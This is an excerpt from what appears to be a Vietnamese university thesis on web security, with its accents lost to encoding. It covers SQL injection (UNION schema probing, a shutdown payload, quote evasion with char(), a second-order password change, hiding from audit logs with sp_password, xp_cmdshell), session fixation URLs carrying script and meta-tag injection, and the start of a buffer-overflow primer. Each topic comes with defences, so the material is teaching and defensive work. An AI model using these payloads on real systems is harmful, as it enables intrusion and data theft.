Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC converting the varchar value 'passOfAdmin' to a column of data type int. SQL Server Driver][SQL Server]Syntax error
bit thng tin v cc bng, ct trong c s d liu, c th truy vn bng n bng h thng INFORMATION_SCHEMA.TABLES. V d 6.III.4-8:
select TABLE_NAME from INFORMATION_SCHEMA.TABLES
INFORMATION_SCHEMA.TABLES cha thng tin v tt c cc table c trn server. Trng TABLE_NAME cha tn ca mi table trong c s d liu.
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME='User'
Cu lnh trn c s dng bit thng tin v ct trong bng. Ngoi ra cn c th dng UNION bit cc bin mi trng ca SQL Server.
-Trang 68-
Khoa CNTT
V d 6.III.4-9: bit ng dng ang chy trn Server no, c th xc nh bng cch sau:
Username:;select @@SERVERNAME union select 1
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'KHOAI_NGU' to a column of data type int.
III.5. Tn cng da vo lnh INSERT

T kho INSERT dng a thng tin vo c s d liu. Thng thng cu lnh INSERT c dng trong cc trng hp nh: thng tin ng k ngi s dng, guestbookv..v K thut ;, -- c dng nh tng dng vi cu lnh SELECT, phi m bo ng s lng v kiu gi tr c nhp vo nhm trnh li v c php (nu khng xc nh c kiu d liu c th nhp tt c l s). V d 6.III.5-1:
SQLString= INSERT INTO User VALUES ( & strUsername & , & strName& , & strPassWord & ,& strLimitSize & )
-Trang 69-
Khoa CNTT
III.6. Tn cng da vo STORED PROCEDURE

Stored Procedure c s dng trong lp trnh Web vi mc ch gim s phc tp trong ng dng v trnh s tn cng trong k thut SQL Injection. Tuy nhin hacker vn c th li dng nhng Stored Procedure tn cng vo h thng. V d 6.III.6-1: Stored procedure sp_login gm hai tham s l username v password. Nu nhp:
Username: nhimmap Password: ;shutdown--
Lnh gi stored procedure nh sau:

exec sp_login nhimmap,;shutdown--
Lnh shutdown thc hin dng SQL Server ngay lp tc.
III.7. Nng cao III.7.1. Chui k t khng c du nhy n:

Nhng nh lp trnh c th bo v ng dng ca h bng cch loi b tt c du nhy, thng thng loi b du nhy bng cch thay mt du nhy thnh 2 du nhy. V d 6.III.7.1-1:
Function escape (input) Input=replace(input, , ) escape=input end function
-Trang 70-
Khoa CNTT
R rng l, n ngn chn c tt c nhng kiu tn cng trn. Tuy nhin nu mun to ra mt chui gi tr m khng dng cc du nhy, c th dng hm char() nh v d sau: V d 6.III.7.1-2:
INSERT into User VALUES(666, +char(0x73) char(0x63) ,char(0x63) +char(0x68) +char(0x68) +char(0x72) char(0x69)
+char(0x72) +char(0x69) +char(0x73),0xffff)
V d 6.III.7.1-3 trn tuy l mt cu truy vn khng c du nhy n no nhng n vn c th insert chui vo bng, v tng ng vi:
INSERT into User VALUES( 666,chris,chris,255)
Hacker cng c th chn username , password l s trnh du nhy nh v d sau: V d 6.III.7.1-4:

INSERT into User VALUES( 667,123,123,0xffff)
SQL server s t ng chuyn t s sang chui.
III.7.2. Tn cng 2 tng

Mc d ng dng thay th du nhy n nhng vn cn kh nng b chn on m SQL . V d 6.III.7.2-1: ng k account trong ng dng, nhp username nh sau:
Username: admin' Password: passofadmin
-Trang 71-
Khoa CNTT
ng dng s thay th du nhy, kt qu trong cu insert s nh sau:

INSERT into User VALUES(123, 'admin''--', 'password',0xffff)
(nhng trong c s d liu s lu l admin--) Gi s rng ng dng cho php ngi dng thay i mt khu. Cc on m ASP c thit k m bo rng ngi s dng phi nhp ng mt khu c trc khi nhp mt khu mi. on m nh sau:
username = escape( Request.form("username") ); oldpassword = escape( Request.form("oldpassword") ); newpassword = escape( Request.form("newpassword") ); var rso = Server.CreateObject("ADODB.Recordset"); var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'"; rso.open( sql, cn ); if (rso.EOF) { Cu truy vn thit lp mt khu mi nh sau: sql = "update users set password = '" + newpassword + "' where username= '" + rso("username") + "'"
rso(username) chnh l gi tr username c c cu truy vn login v n l admin-Cu truy vn lc ny nh sau:
-Trang 72-
Khoa CNTT
update
users
set
password
'password'
where
username
'admin'--'
Nh hacker c th thay i mt khu ca admin bng gi tr ca mnh. y l 1 trng hp cn tn ti trong hu ht nhng ng dng ln ngy nay c s dng c ch loi b d liu. Gii php tt nht l loi b nhng gi tr li hn l chnh sa li. Nhng c mt vn l c mt s nhp d liu (nh nhp tn) cho php nhng k t ny. V d: OBrien. Cch tt nht gii quyt vn ny l khng cho php nhp du nhy n. Nu iu ny khng th thc hin c , th loi b v thay th nh trn. Trong trng hp ny, cch tt nht l m bo tt c d liu c a vo cu truy vn SQL (k c nhng gi tr trong c s d liu) phi c kim sot mt cch cht ch. Mt s ng dng phng chng vic thm cu truy vn t ngi dng bng cch gii hn chiu di ca nhp. Tuy nhin, vi gii hn ny th mt s kiu tn cng khng th thc hin c nhng vn c ch h hacker li dng. V d 6.III.7.2-2: Gi s c username v password u b gii hn ti a l 16 k t. Nhp:
Username: aaaaaaaaaaaaaaa Password :; shutdown--
-Trang 73-
Khoa CNTT
ng dng s thay th mt du nhy n bng hai du nhy n nhng do chiu di chui b gii hn ch l 16 k t nn du nhy n va c thm s b xo mt. Cu lnh SQL nh sau:
Select * from users where username=aaaaaaaaaaaaaaa and password=; shutdown
kt qu l username trong cu lnh c gi tr l:

aaaaaaaaaaaaaaa and password=
III.7.3. Trnh s kim sot:

SQL server c mt giao thc kim sot cht ch bng h hm sp_traceXXX, cho php ghi nhn nhiu s kin xy ra trong c s d liu. c bit l cc s kin T-SQL, ghi nhn li tt c cc cu lnh SQL thc hin trn Server. Nu ch kim sot c bt th tt c cc cu truy vn SQL ca hacker cng b ghi nhn v nh m mt ngi qun tr c th kim sot nhng g ang xy ra v nhanh chng tm ra c gii php. Nhng cng c mt cch chng li iu ny, bng cch thm dng sp_password vo cu lnh T-SQL, v khi gp chui ny th vic kim tra s ghi nhn nh sau:
-- sp_password was found in the text of this event. -- The text has benn replaced with this comment for security reasons.
ngay c khi sp_password xut hin trong phn ch thch. V th du tt c cu truy vn tn cng, ch cn n gin l thm sp_password vo sau -- nh sau:
-Trang 74-
Khoa CNTT
Username:admin--sp_password
III.7.4. Dng Extended Stored Procedure III.7.4.1. Dng Extended Stored Procedure c sn trong h thng
SQL Server
Nu ci SQL Server ch mc nh th SQL Server chy trn nn SYSTEM, tng ng mc truy cp Windows. C th dng master..xp_cmdshell thi hnh lnh t xa:
; exec master..xp_cmdshell 'ping 10.10.1.2'--
Th dng du nhy i (") nu du nhy n (') khng lm vic. Di y l mt s extended stored procedure m hacker thng hay s dng thc thi nhng cu lnh xem ni dung thng tin trong my nn nhn:
Xp_availablemedia Xp_dirtree Xp_loginconfig Xp_makecab
hin th nhng a hin hnh trn my hin th tt c cc th mc k c th mc con Ly thng tin v ch bo mt trn server cho php ngi s dng to cc tp tin lu tr trn Server (hay bt c tp tin no m server c th truy x
-Trang 75-
Khoa CNTT
Xp_ntsec_enumdomain lit k nhng domain m server c th truy vn. Xp_terminate_process chm dt mt tin trnh vi tham s PID ca n.
III.7.4.2. Dng Extended Stored Procedure t to

Extended stored procedure API l mt chng trnh c mt nhim v n gin l to ra mt DLL extended stored porcedure cha ng on m nguy him. a tp tin DLL ln Server c th dng cc cu lnh, hoc cc k thut giao tip khc nhau c thc hin t ng, nh l HTTP download v FTP script. Mt khi tp tin DLL tn ti trn my ch, th hacker c th to mt extended stored procedure bng dng lnh sau : V d 6.III.7.4.2-1:
sp_addextendedproc xp_webserver, c:\temp\xp_foo.dll
Sau c th thc thi n nh l thc thi extended stored procedure thng thng :
exec xp_webserver
Khi thc hin xong, c th xo bng lnh sau:

sp_dropextendedproc xp_webserver
-Trang 76-
Khoa CNTT
III.7.4.3. Nhp tp tin vn bn vo bng

Dng lnh bulk insert, nhp d liu t mt tp tin vn bn vo trong mt bng tm thi. V d 6.III.7.4.3-1:V d to mt bng n gin nh sau:
create table foo (line varchar(8000))
Sau chy cu lnh bulk insert chp d liu t tp tin vo bng V d 6.III.7.4.3-2:
bulk insert foo from c:\inetpub\wwwroot\process_login.asp
Ni dung trang process_login.asp c th ly v bng cch dng nhng k thut nh trong V d 6.III.7.4-3.
IV. CCH PHNG CHNG

Trong hu ht trnh duyt, nhng k t nn c m ho trn a ch URL trc khi c s dng. Vic tn cng theo SQL Injection da vo nhng cu thng bo li do vic phng chng hay nht vn l khng cho hin th nhng thng ip li cho ngi dng bng cch thay th nhng li thng bo bng 1 trang do ngi pht trin thit k mi khi li xy ra trn ng dng. Kim tra k gi tr nhp vo ca ngi dng, thay th nhng k t nh ; v..v..
-Trang 77-
Khoa CNTT
Hy loi b cc k t meta nh ',",/,\,; v cc k t extend nh NULL, CR, LF, ...

trong cc string nhn c t:
o d liu nhp do ngi dng trnh o cc tham s t URL o cc gi tr t cookie i vi cc gi tr numeric, hy chuyn n sang integer trc khi thc hin cu truy vn SQL, hoc dng ISNUMERIC chc chn n l mt s integer. Dng thut ton m ho d liu
IV.1. Kim tra d liu

Kim tra tnh ng n ca d liu l 1 vn phc tp v thng cha c quan tm ng mc trong cc ng dng. Khuynh hng ca vic kim tra tnh ng n ca d liu khng phi l ch cn thm mt s chc nng vo ng dng, m phi kim tra mt cch tng qut nhanh chng t c mc ch. Nhng tm tt sau y s bn v vic kim tra tnh ng n ca d liu, cng vi v d mu minh ho cho vn ny. C ba gii php tip cn vn ny: 1) C gng kim tra v chnh sa lm cho d liu hp l. 2) Loi b nhng d liu bt hp l. 3) Ch chp nhn nhng d liu hp l Gii php 1: kh thc hin Th nht, ngi lp trnh khng cn thit phi bit tt c d liu bt hp l, bi v nhng dng d liu bt hp l rt a dng.
-Trang 78-
Khoa CNTT
Th hai, l vn ca trng hp b tn cng 2 tng (second-oder SQL injection) trong vic ly d liu t h thng ra. Gii php 2: b v hiu trong cc trng hp nh gii php 1 l do : D liu bt hp l lun lun thay i v cng vi vic pht trin cc kiu tn cng mi. Gii php 3: tt hn hai gii php kia, nhng s gp mt s hn ch khi ci t. Cch bo mt tt nht l kt hp c gii php 2 v 3. Mt v d cho s cn thit kt hp 2-3 l du ni gia h v tn Quentin Bassington-Bassington phi cho php du gch ngang trong b nh ngha d liu hp l, nhng chui k t -- l mt chui k t c bit trong SQL server. V d nu c b lc : Lc b nhng d liu bt hp l nh --,select v union Mt hm kim sot loi b du nhy n th c th i ph nh sau.
union select @@version--
Mt s cch ci t cc chc nng kim tra d liu c bn Cch 1: Thay th du nhy n:

function escape( input ) input = replace(input, "'", "''") escape = input end function
-Trang 79-
Khoa CNTT
Cch 2: T chi d liu bt hp l

function validate_string( input ) known_bad = array( "select", "insert", "update", "delete", "drop","--", "'" ) validate_string = true for i = lbound( known_bad ) to ubound( known_bad ) if ( instr( 1, input, known_bad(i), vbtextcompare ) <> 0 ) then validate_string = false exit function end if next end function
Cch 3: Ch chp nhn d liu hp l

function validatepassword( input ) good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" validatepassword = true for i = 1 to len( input ) c = mid( input, i, 1 ) if ( InStr( good_password_chars, c ) = 0 ) then validatepassword = false exit function end if next end function
-Trang 80-
Khoa CNTT
IV.2. Kho cht SQL Server (SQL Server Lockdown)

Lun vn cng gii thiu mt phng php bo mt mc qun tr c s d liu. y l mt danh sch cc cng vic cn lm bo v SQL server: Xc nh cc phng php kt ni n server: o Dng tin ch Network Utility kim tra rng ch c cc th vin mng ang dng l hoat ng. Kim tra tt c cc ti khon c trong SQL Server o Ch to ti khon c quyn thp cho cc ng dng o Loi b nhng ti khon khng cn thit o m bo rng tt c ti khon c mt mt khu hp l, Kim tra cc i tng tn ti o Nhiu extended stored procedure c th c xo b mt cch an ton. Nu iu ny c thc hin, th cng nn xem xt vic loi b lun nhng tp tin .dll cha m ca cc extended stored procedure o Xo b tt c c s d liu mu nh northwind v pubs o Xa cc stored procedure khng dng nh: master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask Kim tra nhng ti khon no c th truy xut n nhng i tng no o i vi nhng ti khon ca mt ng dng no dng truy xut c s d liu th ch c cp nhng quyn hn cn thit ti thiu truy xut n nhng i tng n cn dng.
-Trang 81-
Khoa CNTT
Kim tra lp sa cha ca server o C mt s cch tn cng nh buffer overflow, format string thng ch n lp bo v ny. Kim tra cc phin lm vic trn server Thay i "Startup v chy SQL Server" mc ngi dng quyn hn thp trong SQL Server Security.
Nhn xt:
Qua chng 6 ny, cng thy rng vic kim tra d liu trc khi x l l cn thit. ng dng ngoi vic kim tra tnh ng n ca d liu, cn m ha d liu ngay bn trong c s d liu v khng cho xut trang Web li, bo ni dung li c php SQL hacker khng th thu thp thng tin c s d liu. Song song l cng vic ca ngi qun tr mng.
-Trang 82-
Khoa CNTT
Chng 7: Chim hu phin lm vic
Chng 7
CHIM HU PHIN LM VIC

Ni dung: I. II. Tng quan v SessionID n nh phin lm vic
III. nh cp phin lm vic
-Trang 83-
Khoa CNTT
CHNG 7: CHIM HU PHIN LM VIC
I. TNG QUAN V SESSIONID

Nh cp n Session trong chng 2 phn III, session dng lu tr trng thi lm vic gia trnh duyt v trnh ch. Session ID c th c lu tr trong cookie hay c nhng vo a ch URL hay trong bin n ca form. Mi kiu lu tr u c u v khuyt im, nhng qua thc t cookie vn l la chn tt nht, v l phng php an ton nht. Thng thng, sau khi ngi dng c chng thc da trn nhng thng tin c nhn nh tn/mt khu, session ID c xem nh mt mt khu tnh tm thi cho nhng ln yu cu tip theo. iu ny khin cho Session ID l mc tiu ln cho nhng hacker. Trong nhiu trng hp, hacker ginh c session ID hp l ca ngi dng t t nhp vo phin lm vic ca h. XSS cng l mt cch tn cng c th chim c session ID lu tr trong cookie. Cch tn cng ny gi l session hijacking. Tn cng vo mt phin lm vic thng c thc hin theo 2 kiu chnh sau: n nh phin lm vic nh cp phin lm vic
-Trang 84-
Khoa CNTT
II.N NH PHIN LM VIC

Trong kiu tn cng n nh mt phin lm vic, hacker n nh sn session ID cho nn nhn trc khi h ng nhp vo h thng. Sau , hacker s s dng session ID ny buc vo phin lm vic ca nn nhn . Tm tt qu trnh tn cng: Bc 1: Thit lp session ID. H thng qun l session theo 2 hng: + Hng t do: chp nhn bt k mt session ID, nu cha tn ti session th to mi mt session ID + Hng gii hn: ch chp nhn session ID no ng k trc . Vi h thng hng t do hacker ch cn thit lp mt session ID bt k, nh v sau s dng li session ID ny. hng gii hn, hacker phi ng k mt session ID vi ng dng. Ph thuc vo qui trnh qun l phin lm vic m hacker lu tr thi gian sng ca phin lm vic cho n khi nn nhn ng nhp vo h thng. Thng thng mt phin lm vic khng tn ti v hn nh. H thng s t ng hy b phin lm vic nu n khng thc hin mt thao tc no (thi gian nhn ri ) hoc ht hn nh. Do bc 1a l k tn cng s bo tr phin lm vic bng cch gi yu cu n server.
-Trang 85-
Khoa CNTT
Hnh 7.II-1: S lc qu trnh tn cng ngi dng bng k thut n nh session
Bc 2: Gi ID ny n trnh duyt nn nhn. Hacker gi session ID va to n ngi dng v vic trao i ID session cn ty vo ng dng m c th qua URL, bin n form hay cookie. Cc cch tn cng thng dng gm: o Tn cng session ID trn tham s URL. o Tn cng session ID bng bin n form. o Tn cng session ID trong cookie. Bc 3: t nhp vo phin lm vic ca nn nhn. Sau khi nn nhn ng nhp vo h thng qua session ID c ch nh sn v cha thot khi ng dng, hacker lc ny bt u dng session ID bc vo phin lm vic ca nn nhn.
-Trang 86-
Khoa CNTT
Hnh 7.II-2: M t chi tit qu trnh thc hin tn cng ngi dng bng k thut n nh phin lm vic.
Tip theo lun vn s trnh by v cc cch tn cng session ID trong bc 2.
-Trang 87-
Khoa CNTT
II.1. Tn cng Session ID trn tham s URL

Hacker gi mt lin kt yu cu ngi dng ng nhp vo h thng my ch vi sessionID c n nh sn trn URL. V d 7.II.1-1: http://online.worldbank.com/login.jsp?sessionid=1234
Hnh 7.II.1-1: Tn cng thng qua tham s URL
1. Hacker m dch v trc tuyn ca ngn hng thng qua a ch online.worldbank.com 2. Nhn c mt session ID t trnh ch xc nh phin lm vic ca hacker. V d session ID c gi tr l 1234. 3. Sau hacker s tm cch gi mt lin kt n mt ngi dng no c ti khon trong ngn hng ny. Nhng lin kt thng l dn n trang ng nhp vo ti khon trong ngn hng v d lin kt l http://online.workbank.com/login.jsp?sessionid=1234, la ngi dng lm vic trong phin lm vic ca hackerkhi ngi dng nhn c lin kt ny,
-Trang 88-
Khoa CNTT
4. Ngi dng b mc la v m ng dng Web bng lin kt ca hacker. Do c session ID (ca hacker) nn trnh ch s khng to mt session ID mi. 5. Ngi dng vn tip tc ng nhp vi thng tin ca mnh qun l ti khon. 6. Khi hacker s vo ti khon ca ngi dng m khng cn phi ng nhp v c cng phin lm vic. Nhn xt: Cch tn cng ny i hi ng dng phi to session ID ngay khi ngi dng s dng ng dng. D b pht hin bi ngi dng.
II.2. Tn cng Session ID trong bin n form

K thut ny cng tng t nh k thut bin n form, ngha l sau khi hacker xem m HTML ca trang Web, nhn thy session ID c t trong bin n form, hacker s gi mt sessionID cng trn URL n ngi dng hoc mt trang Web ging trang ch nhng vi bin n form mang gi tr n nh sn. Nhn xt: Phng php ny cng khng kh thi v cng d b pht hin nh phng php trn.
II.3. Tn cng Session ID trong cookie

Bng vic li dng cookie, hacker c ba cch a mt session ID n trnh duyt ca nn nhn: S dng ngn ng kch bn( Javascript, VBscript..) thit lp mt cookie trong trnh duyt ca nn nhn. S dng th <META> thit lp thuc tnh Set-Cookie S dng Set-Cookie ca HTTP header tr li
-Trang 89-
Khoa CNTT
C th l: a) Thit lp mt cookie trn trnh duyt bng ngn ng kch bn: Hu ht trnh duyt u h tr cc ngn ng kch bn thc thi trn trnh duyt nh Javascript, VBScript. C hai ngn ng ny c th thit lp mt cookie cho trnh duyt bng cch thit lp gi tr document.cookie. V d 7.II.3-1:
http://online.workbank.com/<script>document.cookie= sessionid=1234; domain= .workbank.com;</script>.idc
Bn cnh , hacker c th thit lp thi gian sng cho cookie, domain cookie v cch ny ph hp vi nhng h thng hng t do. V d domain no thuc .workbank.com u c th c c gi tr cookie ny. b) Dng th <META> vi thuc tnh Set-Cookie: ng dng cng c th thit lp cookie cho trnh duyt bng th <META> trong HTML. V d 7.II.3-2:
< meta http-equiv= Set-Cookie content=sessionid=1234>
Meta tag Injection (Thm th meta): Vi nhng h thng kim tra i s vi th <SCRIPT> th k thut XSS gp nhiu kh khn, do thm th <META> l phng php kh hu hiu cho php thao tc trn cookie. Thng thng th <META> c t gia th
-Trang 90-
Khoa CNTT
<HEAD></HEAD> nhng n vn c th c x l nu t bt c u trong trang HTML. V d 7.III-3:

http://online.workbank.dom/<meta%20http-equiv=SetCookie%20content=sessionid=1234;%20 2010%2000:00:00%20GMT>.idc Expires=Friday, %201-Jan-
Phng php ny chim u th hn XSS ch khng b ph hy trong IE ( khng cho php thao tc cc ngn ng kch bn trn trnh duyt), ngoi tr th <META REFRESH> c) Thit lp cookie dng thuc tnh Set-Cookie trong header HTTP response: Cch ny thit lp mt cookie cho trnh duyt bng cch dng Set-Cookie trong header HTTP thng qua k thut tn cng DNS server,
II.4. Cch phng chng

Trc ht cng cn ni r rng vic phng chng kiu tn cng n nh session ID ny khng thuc trch nhim ca trnh ch Web server, v trnh ch ch cung cp API qun l phin lm vic cho ng dng. V th, ch ng dng mi cn c nhng bin php phng chng li kiu tn cng ny. Bin php 1: Chng vic ng nhp vi mt session ID c sn Theo kiu tn cng ny, ngi dng ng nhp vo h thng thng qua mt session ID do hacker to sn thay v cho trnh ch to mi, do c th phng chng, ng dng phi hy b session ID c cung cp bi trnh duyt
-Trang 91-
Khoa CNTT
ca ngi dng khi ng nhp v lun to mt session ID mi khi ngi dng ng nhp thnh cng. Bin php 2: Phng chng nhng hacker bn ngoi h thng Vic to ng dng trn h thng theo hng gii hn ( ch to mt session ID mi cho ngi dng sau khi h thnh cng ) s khin cho nhng hacker khng phi l ngi dng hp l ca h thng khng th s dng phng php tn cng ny. Bin php 3: Gii hn phm vi ng dng ca session ID o Kt hp Session ID vi a ch ca trnh duyt. o Kt hp Session ID vi thng tin chng thc c m ho SSL ca ngi dng. o Xa b session khi ngi dng thot khi h thng hay ht hiu lc, c th thc hin trn trnh ch hoc trnh duyt (cookie) o Ngi s dng phi dng ch thot khi h thng xa b session hin thi v c th nhng session ID cn lu li trn h thng khi h qun thot ra ngoi nhng ln trc o Thit lp thi gian ht hiu lc cho session, trnh trng hp hacker c th duy tr session v s dng n lu di.
III. NH CP PHIN LM VIC

Khc vi kiu tn cng n nh phin lm vic, hacker nh cp mt session ID ca ngi dng khi h ang trong phin lm vic ca mnh. V c th nh cp session ID ca ngi dng, hacker c th dng nhng phng php sau:
-Trang 92-
Khoa CNTT
D on phin lm vic Vt cn phin lm vic. Dng on m nh cp phin lm vic
III.1. Tn cng kiu d on phin lm vic (Prediction sessionID)

Hacker phi l ngi dng hp l ca h thng, sau vi ln ng nhp vo h thng, hacker xem xt cc gi tr session ID nhn c, tm ra qui lut pht sinh v t c th on c gi tr ca mt phin lm vic ca ngi dng k tip.
III.2. Tn cng kiu vt cn phin lm vic (Brute force ID)

Hacker c th t to mt chng trnh gi nhiu yu cu trong mt khong thi gian n trnh ch. Mi mt yu cu km theo mt session ID tm cc session ID ang tn ti. Hacker da vo thi quen ca nhng nh pht trin ng dng ly thi gian hay a ch IP ca ngi dng to sessionID hn ch vng vt cn. V d 7.III.2-1: Tn cng trn trang Register.com Bt k ai ng k qun l domain trn Register.com cng c quyn thay i ni dung DNS ca mnh. Mc ch ca hacker l c c mt khu ca ngi qun tr domain trn Register.com. Chc nng thay i mt khu ca Reister.com l im yu m hacker s dng. Khi ngi dng mun thay i mt khu, nhp vo lin kt Forgot password. Sau Register.com s gi mt email cung cp cho ngi dng mt lin kt km theo session ID trn URL xc thc vic thay i.
-Trang 93-
Khoa CNTT
III.3. Tn cng kiu dng on m nh cp phin lm vic

Bng cch chn vo mt on m thc thi trn chnh trnh duyt ca nn nhn, hacker c th la ngi dng theo vt mt lin kt t thc hin nh cp cookie ca ngi dng v cch ny c thc hin thng qua li Cross-Site Scripting. Sau khi c c phin lm vic ca ngi dng, hacker vo phin lm vic ca h.
III.4. Bin php phng chng

Ni dung cch phng chng tng t nh cch phng chng trong k thut n nh phin lm vic v cch tn cng Cross-Site Scripting. V mt s lu sau y: Khng c ch quan khi ngh rng thut ton to session ca ng dng l bo mt, khng ai c th on c. Vi session ID qu ngn, hacker c th dng k thut Vt cn. Nhng khng v th m cho rng ng dng s bo mt vi session ID di v phc tp v kch thc session ID s l mt vn nu thut ton khng tt.
III.1. S khc bit gia nh cp phin lm vic (session hijacking) v n nh phin lm vic (session fixation)
-Trang 94-
Khoa CNTT
Session hijacking Thi gian
Session fixation
- Tn cng vo trnh duyt - Tn cng vo trnh duyt ca ca nn nhn sau khi nn nn nhn trc khi nn nhn nhn ng nhp vo h ng nhp vo h thng thng
nh hng
- Ginh c quyn truy - Hacker ginh c quyn cp mt ln. truy cp 1 ln, tm thi, hoc thi gian di trong mi ln tn cng vo phin lm vic ca nn nhn
Duy tr phin lm - Khng yu cu s duy tr C th yu cu duy tr session vic Hng tn cng phin lm vic cho n khi nn nhn ng nhp 1. Khai thc l hng XSS 1. Yu cu ngi dng ng trn my ch nhp vo h thng thng qua 2. Chp ly session ID mt lin kt hay mt form trong phn HTTP Header b thay i. Referer gi n cho Web 2. Khai thc l hng XSS trn server khc bt k mt my ch no trn 3. Khai thc lu lng domain ca nn nhn mng ( vi nhng lin kt 3. Khai thc l hng trong th n my ch khng c <META> trn bt k mt my m ho) ch no trn domain ca nn nhn 4. Thm mt Server c kh nng to session ID cng
-Trang 95-
Khoa CNTT
domain vi my ch vo trong my ch DNS ca nn nhn. 5. Thay i lu lng mng Mc tiu - Trnh ch - Communication link - Tt c my ch trn domain ch. - My ch DNS - Trnh ch - Communication link
Nhn xt:
K thut tn cng ny li dng s lng lo trong vic qun l phin lm vic ca ng dng ng thi nhm n nhng ngi s dng thiu cn trng trong vic truy cp mt ng dng Web. Trong cc chng c cp, ch c k thut XSS v qun l phin lm vic l li dng s thiu thn trng ca ngi dng.
-Trang 96-
Khoa CNTT
Chng 8: Trn b m (Buffer Overflow)
Chng 8
TRN B M
Ni dung: I. II. III. IV. Khi nim S t chc ca b nh Mt s cch gy li trn b m qua ng dng Web Cch phng chng
-Trang 97-
Khoa CNTT
CHNG 8: TRN B M (BUFFER OVERFLOW)
I. KHI NIM
Buffer overflow tng l l hng trong h thng bo mt ca UNIX t nhiu nm nay nhng ch c cng b sau bui tho lun ca Dr. Mudge trong ti liu 1995 Bng cch no vit mt chng trnh khai thc l hng Buffer Overflow(1) Vi k thut Buffer Overflow, cho php mt s lng ln d liu c cung cp bi ngi dng m vt qu lng b nh cp pht ban u bi ng dng do gy cho h thng lm vo tnh trng trn b nh, thm ch c th b chn thm mt on m bt k. Nu ng dng c cu hnh c thc thi nh root th ngi tn cng c th thao tc nh mt nh qun tr h thng ca web server. Hu ht nhng vn u pht sinh t kh nng lp trnh yu km ca nhng nh lp trnh. n c l s cu th trong kim tra kch thc d liu nhp vo. V d 8.I-1:
func(char *ch) { char buffer[256]; strcpy(buffer,ch); }
Buffer ch c cp pht 256 byte nhng hm func, nu buffer nhn 257 k t t ch th li trn b m.
-Trang 98-
Khoa CNTT
K thut khai thc li trn b m (buffer overflow exploit) c xem l mt trong nhng k thut hacking kinh in nht. Chng 5 c chia lm 2 phn: Phn 1: T chc b nh, stack, gi hm, shellcode. Gii thiu t chc b nh ca mt tin trnh (process), cc thao tc trn b nh stack khi gi hm v k thut c bn to shellcode - on m thc thi mt giao tip dng lnh (shell). Phn 2: K thut khai thc li trn b m. Gii thiu k thut trn b m c bn, t chc shellcode, xc nh a ch tr v, a ch shellcode, cch truyn shellcode cho chng trnh b li. Cc chi tit k thut minh ho y c thc hin trn mi trng Linux x86 (kernel 2.2.20, glibc-2.1.3), tuy nhin v mt l thuyt c th p dng cho bt k mi trng no khc.
II. S T CHC CA B NH:
Hnh 8.II-1: S t chc b nh
-Trang 99-
Khoa CNTT
Mi tin trnh thc thi u c h iu hnh cp cho mt khng gian b nh o (logic) ging nhau. Khng gian nh ny gm 3 vng: text, data v stack. ngha ca 3 vng ny nh sau: Vng Text l vng c nh, cha cc m lnh thc thi (instruction) v d liu ch c (read-only). Vng ny c chia s gia cc tin trnh thc thi cng mt file chng trnh v tng ng vi phn on text ca file thc thi. D liu vng ny l ch c, mi thao tc nhm ghi ln vng nh ny u gy li segmentation violation. Vng Data cha cc d liu c khi to hoc cha khi to gi tr. Cc bin ton cc v bin tnh c cha trong vng ny. Vng Stack l vng nh c dnh ring khi thc thi chng trnh dng cha gi tr cc bin cc b ca hm, tham s gi hm cng nh gi tr tr v. Thao tc trn b nh stack c thao tc theo c ch "vo sau ra trc" - LIFO (Last In, First Out) vi hai lnh quan trng nht l PUSH v POP. Trong phm vi bi vit ny, lun vn ch tp trung tm hiu v vng stack.
II.1. Stack
Stack l vng nh dng lu cc tham s v cc bin cc b ca hm, gi tr EBP ( a ch y Stack ), a ch tr v. Cc bin c cp pht t vng nh cao n vng nh thp. Stack hot ng theo nguyn tc "vo sau ra trc"(Last In First Out - LIFO). Cc gi tr c y vo stack sau cng s c ly ra khi stack trc tin.
-Trang 100-
Khoa CNTT
II.2. Push v Pop

Stack t trn xung dui(t vng nh cao n vng nh thp). Thanh ghi ESP lun tr n nh ca stack(vng nh c a ch thp).
Hnh 8.II.2-1: stack
PUSH mt gi tr vo stack
Hnh 8.II.2-2: push mt gi tr vo stack
(1) ESP=ESP-kch thc ca gi tr (2) Value c y vo stack POP mt value ra khi stack
-Trang 101-
Khoa CNTT
Hnh 8.II.2-3: pop mt gi tri ra khi stack
(1) Value c ly ra khi stack (2) ESP=ESP++ kch thc ca gi tr
II.3. Cch lm vic ca hm

Mt chng trnh c chia thnh nhiu on m gi l th tc (procedure). Mi th tc chu trch nhim v mt hnh ng no ca chng trnh. Mi th tc sau khi hon thnh nhim v s gi th tc k tip. Sau li gi mt th tc, a ch k tip sau a ch gi th tc s c lu vo trong STACK. V d 8.II.3-1:
0x0012FF00 0x0012FF01 0x0012FF02 0x0012FF03 0x0012FF04----------------------------nh Stack 0x0012FF05 0x0012FF06 0x0012FF07 0x0012FF08----------------------------y Stack
-Trang 102-
Khoa CNTT
0x401F2034 gi th tc Q -> th tc Q c gi thc thi 0x401F2035 0x40209876 th tc Q 0xFFFFFFFF Khi lnh ti a ch 0x401F2034 c thc thi th khng gian a ch nh sau: 0x0012FF00----------------------------nh Stack 0x0012FF01 0x0012FF02 0x0012FF03 0x0012FF04 0x0012FF05 0x0012FF06 0x0012FF07 0x0012FF08----------------------------y Stack . 40 1F 20 35
Nh vy a ch sau a ch gi th tc c a vo trong STACK. Khi th tc Q chun b hon thnh nhim v ca mnh v sn sng quay tr v th tin trnh nhn li a ch lu trc STACK v khi phc li vic thc thi. a ch ny c gi l saved return address. Ghi ch: Thanh ghi EIP lun tr n a ch ca cu lnh tip theo cn thi hnh
-Trang 103-
Khoa CNTT
V d 8.II.3-2:
strcpy(one,two); printf("Okie\n");
th return address s tr ti v tr ca lnh gi ti hm printf trong b nh, v khi hm strcpy kt thc th con tr lnh s ch ti .
II.4. Shell code

Cn phi thay i a ch tr v tr n shellcode mt shell. C th hnh dung ra cch t shellcode trn stack nh sau: i. Trc khi trn b m:
y ca b nh nh ca stack B = buffer E = stack frame pointer R = return address F = cc data khc nh ca b nh y ca stack
<----- FFFFF BBBBBBBBBBBBBBBBBBBBB EEEE RRRR FFFFFFFFFF
ii. Khi trn b m:

